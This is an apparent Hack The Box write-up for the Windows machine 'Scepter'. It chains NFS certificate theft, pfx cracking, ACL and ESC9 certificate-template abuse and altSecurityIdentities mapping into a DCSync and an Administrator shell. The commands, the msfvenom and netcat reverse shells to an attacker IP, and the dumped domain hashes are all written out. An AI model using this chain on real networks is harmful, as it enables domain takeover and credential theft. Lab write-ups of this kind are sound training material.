Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Scepter (Windows)
NFS certificate discovery and ADCS abuse chain from d.baker to h.brown, ACL and altSecurityIdentities mapping to compromise p.adams, then DCSync to Administrator.
Target
- IP:
10.129.230.235
Recon
sudo nmap -sC -sV 10.129.230.235 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-20 05:45:57Z)
111/tcp open rpcbind?
| rpcinfo:
| program version port/proto service
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
|_ 100003 2,3,4 2049/tcp6 nfs
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T05:47:01+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T03:22:33
| Not valid after: 2025-11-01T03:22:33
| MD5: 2af6:88f7:a6bf:ef50:9b84:3dc6:3df5:e018
|_SHA-1: cd9a:97ee:25c8:00ba:1427:c259:02ed:6e0d:9a21:7fd9
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T05:47:02+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T03:22:33
| Not valid after: 2025-11-01T03:22:33
| MD5: 2af6:88f7:a6bf:ef50:9b84:3dc6:3df5:e018
|_SHA-1: cd9a:97ee:25c8:00ba:1427:c259:02ed:6e0d:9a21:7fd9
2049/tcp open nfs 2-4 (RPC #100003)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T05:47:01+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T03:22:33
| Not valid after: 2025-11-01T03:22:33
| MD5: 2af6:88f7:a6bf:ef50:9b84:3dc6:3df5:e018
|_SHA-1: cd9a:97ee:25c8:00ba:1427:c259:02ed:6e0d:9a21:7fd9
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Issuer: commonName=scepter-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T03:22:33
| Not valid after: 2025-11-01T03:22:33
| MD5: 2af6:88f7:a6bf:ef50:9b84:3dc6:3df5:e018
|_SHA-1: cd9a:97ee:25c8:00ba:1427:c259:02ed:6e0d:9a21:7fd9
|_ssl-date: 2025-04-20T05:47:02+00:00; +8h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Issuer: commonName=dc01.scepter.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-01T00:21:41
| Not valid after: 2025-11-01T00:41:41
| MD5: e84c:6894:816e:b7f5:4338:0a1f:a896:2075
|_SHA-1: 4e58:3799:020d:aaf4:d5ce:0c1e:76db:32cd:5a0e:28a7
|_ssl-date: 2025-04-20T05:47:02+00:00; +8h00m02s from scanner time.
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-20T05:46:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s
Add dc01.scepter.htb and scepter.htb to /etc/hosts.
showmount -e 10.129.230.235
Export list for 10.129.230.235:
/helpdesk (everyone)
sudo mount -t nfs 10.129.230.235:/helpdesk ./mnt -o nolock
Inside mnt/helpdesk we find these files:
baker.crt baker.key clark.pfx lewis.pfx scott.pfx
openssl x509 -in baker.crt -text -noout
We find an email:
d.baker@scepter.htb
pfx2john *.pfx > hash
./john/run/john --wordlist=./rockyou.txt ./hash
newpassword (lewis.pfx)
newpassword (clark.pfx)
newpassword (scott.pfx)
certipy cert -export -pfx lewis.pfx -password newpassword -out "lewis_unprotected.pfx"
certipy cert -export -pfx clark.pfx -password newpassword -out "clark_unprotected.pfx"
certipy cert -export -pfx scott.pfx -password newpassword -out "scott_unprotected.pfx"
strings *unprotected.pfx | grep scepter
We find more emails:
m.clark@scepter.htb
o.scott@scepter.htb
e.lewis@scepter.htb
If we try authenticating with one of these certificates, for example:
certipy auth -pfx lewis_unprotected.pfx
We get:
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Same for the others.
openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt
Enter newpassword as passphrase for baker.key.
sudo ntpdate dc01.scepter.htb
certipy auth -pfx baker.pfx -domain 'scepter.htb' -dc-ip 10.129.230.235
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce
bloodhound-python -u 'd.baker' --hashes ':18b5fb0d99e7a475316213c15b6f22ce' -ns 10.129.230.235 -d 'scepter.htb' -dc 'dc01.scepter.htb' -c All --zip
A .zip file is created.
sudo neo4j console
bloodhound --no-sandbox
Upload the zip into BloodHound.
In BloodHound, click d.baker --> node info --> transitive object control.
We see d.baker has a forcechangepassword relation to a.carter.
Download bloodyAD:
- https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip dc01.scepter.htb -u 'd.baker' -p ':18b5fb0d99e7a475316213c15b6f22ce' set password 'a.carter' '!Kali12345678!'
[+] Password changed successfully!
nxc smb 10.129.230.235 -u a.carter -p '!Kali12345678!'
SMB 10.129.230.235 445 DC01 [+] scepter.htb\a.carter:!Kali12345678!
In BloodHound, click a.carter --> node info --> transitive object control.
We see a.carter is part of it support, which has genericall over staff access certificate.
staff access certificate is an organizational unit (OU).
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'a.carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb'/'a.carter':'!Kali12345678!'
[*] DACL modified successfully!
dacledit.py -action 'read' -principal 'a.carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb'/'a.carter':'!Kali12345678!'
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-74879546-916818434-740295365-1107)
[*] ACE[7] info
[*] ACE Type : ACCESS_ALLOWED_ACE
[*] ACE flags : CONTAINER_INHERIT_ACE, OBJECT_INHERIT_ACE
[*] Access mask : FullControl (0xf01ff)
[*] Trustee (SID) : a.carter (S-1-5-21-74879546-916818434-740295365-1107)
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip dc01.scepter.htb -u 'a.carter' -p '!Kali12345678!' set password 'd.baker' '!Kali12345678!'
certipy find -u d.baker -hashes '18b5fb0d99e7a475316213c15b6f22ce' -target scepter.htb -text -stdout -vulnerable
Template Name : StaffAccessCertificate
Display Name : StaffAccessCertificate
Certificate Authorities : scepter-DC01-CA
Certificate Name Flag : SubjectRequireEmail
SubjectRequireDnsAsCn
SubjectAltRequireEmail
Permissions
Enrollment Permissions
Enrollment Rights : SCEPTER.HTB\staff
[!] Vulnerabilities
ESC9 : 'SCEPTER.HTB\\staff' can enroll and template has no security extension
d.baker is part of group staff.
certipy shadow auto -username a.carter@scepter.htb -password '!Kali12345678!' -account d.baker
[*] NT hash for 'd.baker': 18b5fb0d99e7a475316213c15b6f22ce
certipy account update -username a.carter@scepter.htb -password '!Kali12345678!' -user d.baker -upn h.brown
[*] Updating user 'd.baker':
userPrincipalName : Administrator
[*] Successfully updated 'd.baker'
From certipy find output we notice email is required.
Check if email is set:
ldapsearch -x -H ldap://dc01.scepter.htb -D "a.carter" -w '!Kali12345678!' -b "CN=D.BAKER,OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" mail
It is not set.
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip dc01.scepter.htb -u 'a.carter' -p '!Kali12345678!' set object 'd.baker' mail -v 'h.brown@scepter.htb'
[+] d.baker's mail has been updated
Now if we execute the previous ldapsearch command we can see the mail is set.
certipy req -username "d.baker@scepter.htb" -hashes '18b5fb0d99e7a475316213c15b6f22ce' -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
[*] Saved certificate and private key to 'd.baker.pfx'
Reset the UPN:
certipy account update -username a.carter@scepter.htb -password '!Kali12345678!' -user d.baker -upn d.baker
certipy auth -pfx d.baker.pfx -domain scepter.htb -username h.brown
[*] Saved credential cache to 'h.brown.ccache'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
export KRB5CCNAME='h.brown.ccache'
nxc smb dc01.scepter.htb -d scepter.htb -k --use-kcache
SMB dc01.scepter.htb 445 DC01 [+] scepter.htb\h.brown from ccache
nxc smb dc01.scepter.htb -d scepter.htb -u 'h.brown' --hash '4ecf5242092c6fb8c360a08069c75a0c'
SMB 10.129.187.180 445 DC01 [-] scepter.htb\h.brown:4ecf5242092c6fb8c360a08069c75a0c STATUS_ACCOUNT_RESTRICTION
sudo vim /etc/krb5.conf
Under [realms], add these lines:
SCEPTER.HTB = {
kdc = dc01.scepter.htb
}
evil-winrm -i dc01.scepter.htb -r scepter.htb
We get a PowerShell shell as user h.brown.
Since this shell is not very stable (it crashes shortly after), we get a Meterpreter session.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.252 LPORT=4444 -f exe -o reverse.exe
Upload reverse.exe to the target machine.
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
set LPORT 4444
run
Execute reverse.exe.
We get a Meterpreter session.
Or we can get a reverse shell with nc64.exe.
Download nc64.exe and upload to target:
- https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Listen with netcat:
rlwrap nc -vlnp 5555
.\nc64.exe -e cmd.exe 10.10.14.252 5555
We get a reverse shell.
Download PowerView.ps1 and upload it to target:
- https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Recon/PowerView.ps1
. .\PowerView.ps1
Find-InterestingDomainAcl
ObjectDN : CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteProperty
ObjectAceType : 00fbf30c-91fe-11d1-aebc-0000f80367c1
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowedObject
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-74879546-916818434-740295365-1601
IdentityReferenceName : CMS
IdentityReferenceDomain : scepter.htb
IdentityReferenceDN : CN=CMS,CN=Users,DC=scepter,DC=htb
IdentityReferenceClass : group
ObjectDN : OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteProperty
ObjectAceType : 00fbf30c-91fe-11d1-aebc-0000f80367c1
AceFlags : ContainerInherit, InheritOnly
AceType : AccessAllowedObject
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-74879546-916818434-740295365-1601
IdentityReferenceName : CMS
IdentityReferenceDomain : scepter.htb
IdentityReferenceDN : CN=CMS,CN=Users,DC=scepter,DC=htb
IdentityReferenceClass : group
Group CMS has WriteProperty over user p.adams and over OU Helpdesk Enrollment Certificate, specifically on attribute 00fbf30c-91fe-11d1-aebc-0000f80367c1, which maps to altSecurityIdentities.
We can define a certificate mapping to user p.adams.
Useful sites:
- https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
- https://support.oneidentity.com/technical-documents/safeguard-authentication-services/5.0.3/authentication-services-for-smart-cards-administration-guide/15
- https://learn.microsoft.com/en-us/archive/blogs/spatdsg/howto-map-a-user-to-a-certificate-via-all-the-methods-available-in-the-altsecurityidentities-attribute
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip dc01.scepter.htb -u 'a.carter' -p '!Kali12345678!' set object 'd.baker' mail -v 'test@test.com'
[+] d.baker's mail has been updated
certipy req -username "d.baker@scepter.htb" -hashes '18b5fb0d99e7a475316213c15b6f22ce' -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
[*] Saved certificate and private key to 'd.baker.pfx'
python3 bloodyAD/bloodyAD.py --host 'dc01.scepter.htb' -d scepter.htb --dc-ip 10.129.36.19 -k set object 'p.adams' altSecurityIdentities -v 'X509:<RFC822>test@test.com'
[+] p.adams's altSecurityIdentities has been updated
certipy auth -pfx d.baker.pfx -domain scepter.htb -username p.adams -dc-ip 10.129.36.19
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
nxc smb dc01.scepter.htb -d scepter.htb -u 'p.adams' --hash '1b925c524f447bb821a8789c4b118ce0'
SMB 10.129.36.19 445 DC01 [+] scepter.htb\p.adams:1b925c524f447bb821a8789c4b118ce0
User p.adams has a dcsync relation toward scepter.htb.
secretsdump.py 'scepter.htb'/'p.adams'@dc01.scepter.htb -hashes ':1b925c524f447bb821a8789c4b118ce0'
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
d.baker\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
evil-winrm -i dc01.scepter.htb -u Administrator -H a291ead3493f9773dc615e66c2ea21c4
We get a PowerShell shell as user Administrator.